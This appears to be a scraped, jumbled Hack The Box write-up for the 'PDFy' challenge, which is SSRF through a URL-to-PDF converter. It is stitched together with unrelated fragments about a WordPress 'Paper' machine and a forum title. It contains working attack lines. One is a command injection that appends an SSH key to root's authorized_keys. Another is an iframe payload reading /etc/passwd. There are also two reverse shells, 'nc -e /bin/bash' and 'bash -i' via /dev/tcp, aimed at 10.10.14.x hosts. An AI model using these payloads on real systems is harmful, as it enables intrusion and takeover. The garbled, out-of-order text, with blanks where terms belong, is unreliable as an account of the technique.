×

Pdfy — Htb Writeup Upd

Since the HTB challenge environment is remote, your local server must be reachable. Use ngrok (or a VPS) to create a public tunnel:

sudo /usr/local/bin/pdf_convert.py "test; echo '$(cat id_rsa.pub)' >> /root/.ssh/authorized_keys;"

Crafted PDF with title:

machine is an easy-difficulty Linux box. A high-quality writeup (or "paper") for this machine should follow a professional structure similar to the official HTB sample report Enumeration : Document the scan identifying ports 22, 80, and 443. Vulnerability Discovery : Note the X-Backend-Server header which reveals the office.paper hostname. Mention using to find vulnerabilities in the WordPress site. : Explain the discovery of the chat.office.paper

<img src="http://127.0.0.1:8080/generate?html=<iframe src='file:///etc/passwd' />"> pdfy htb writeup upd

When you start the PDFy machine, you are presented with a simple web application. The core functionality allows a user to submit a URL. The backend server fetches the content of that URL, converts it into a PDF document, and then presents a link to download the generated PDF.

Example using bash -i :

The core functionality—fetching a remote URL and rendering it—is a textbook indicator for potential .

Input the URL of your hosted redirect script into the PDFy web form (e.g., http://your-server-ip/index.php ). The PDFy server sends a request to your server. Since the HTB challenge environment is remote, your

# Establish a reverse shell os.system('nc 10.10.14.12 4444 -e /bin/bash')

ngrok http 8080

Because the application blindly trusts any URL submitted to /api/cache , we can force wkhtmltopdf to fetch and convert internal resources (such as file:///etc/passwd ) by embedding special directives in a crafted HTML page.

Official PDFy Discussion - Page 2 - Challenges - Hack The Box The core functionality allows a user to submit a URL

If the engine parses custom HTML, an attacker might typically inject:

By inspecting the metadata of the generated PDF files (using tools like exiftool or by looking at the PDF's properties), you can identify the backend engine: .

: In many HTB "PDF" challenges, common engines include wkhtmltopdf , dompdf , or PDFKit . 🚀 Step 2: Identification & Exploitation

$ echo "<?php system('bash -i >& /dev/tcp/10.10.14.16/4444 0>&1'); ?>" > shell.pdf